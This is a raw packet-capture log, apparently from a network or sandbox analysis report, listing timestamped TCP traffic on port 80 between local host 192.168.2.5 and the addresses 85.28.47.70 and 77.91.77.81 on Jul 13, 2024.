                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099808931 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099812031 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099843025 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099874973 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099889040 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099889040 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099926949 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099957943 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099971056 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099971056 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.099992037 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100024939 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100030899 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100030899 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100059986 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100094080 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100101948 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100101948 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100127935 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100159883 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100193024 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100209951 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100209951 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100225925 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100259066 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100298882 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100298882 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100348949 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100380898 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100414991 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100419998 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100419998 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100446939 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100490093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100490093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100497961 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100536108 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100574017 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100574017 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100586891 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100615978 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100651026 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100683928 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100692034 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100692034 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100714922 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100748062 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100754023 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100754023 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100780964 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100814104 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100821018 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100821018 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100847006 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100853920 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100898027 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100933075 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100939035 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100939035 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100960970 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.100992918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101006031 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101006031 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101046085 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101073980 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101079941 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101097107 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101118088 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101131916 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101151943 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101180077 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101203918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101237059 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101252079 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101253033 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101284981 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101288080 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101337910 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101342916 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101371050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101385117 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101404905 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101425886 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101454020 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101457119 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101490974 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101525068 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101543903 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101560116 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101577044 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101593971 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101604939 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101624012 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101643085 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101658106 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101671934 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101692915 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101702929 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101726055 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101737022 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101761103 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101767063 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101804018 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101811886 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101845980 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101859093 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101880074 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101887941 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101913929 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101924896 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101955891 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101963997 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.101998091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102030039 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102037907 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102037907 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102065086 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102092981 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102119923 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102138042 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102144003 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102179050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102190971 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102221966 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102230072 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102267981 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102276087 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102303028 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102313042 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102336884 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102348089 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102371931 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102380037 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102406025 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102420092 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102436066 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102448940 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102484941 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102518082 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102524996 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102524996 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102549076 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102582932 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102586985 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102586985 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102632046 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102664948 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102672100 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102672100 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102693081 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102732897 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102732897 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102741957 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102775097 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102777958 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102807999 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102839947 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102871895 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102880955 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102880955 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102905035 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102936983 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102945089 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102945089 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.102972031 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103001118 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103010893 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103010893 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103034019 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103049994 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103066921 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103079081 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103101969 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103136063 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103146076 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103168011 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103180885 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103204966 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103214979 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103233099 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103250980 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103266954 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103280067 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103302002 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103312016 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103331089 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103346109 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103375912 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103384018 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103418112 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103461981 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103466988 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103501081 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103511095 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103545904 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103554010 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103588104 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103601933 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103630066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103638887 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103672981 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103704929 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103717089 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103739023 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103751898 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103785038 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103791952 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103827000 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103837013 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103871107 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103877068 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103913069 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103919029 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103944063 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103976965 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103979111 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.103979111 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104010105 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104026079 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104043007 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104053020 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104075909 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104088068 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104110003 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104121923 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104161978 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104202986 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104202986 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104212046 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104264975 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104273081 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104298115 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104331017 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104347944 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104347944 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104363918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104394913 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104409933 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104429007 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104438066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104463100 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104474068 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104512930 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104531050 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104564905 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104568005 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104614973 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104623079 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104670048 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104675055 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104710102 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104723930 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104753017 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104759932 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104794979 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104808092 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104823112 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104835987 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104856014 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104888916 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104895115 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104895115 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104919910 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104959011 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104959965 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104959965 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.104993105 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.105026960 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.105031967 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.105031967 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.105103970 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.105264902 CEST805898277.91.77.81192.168.2.5
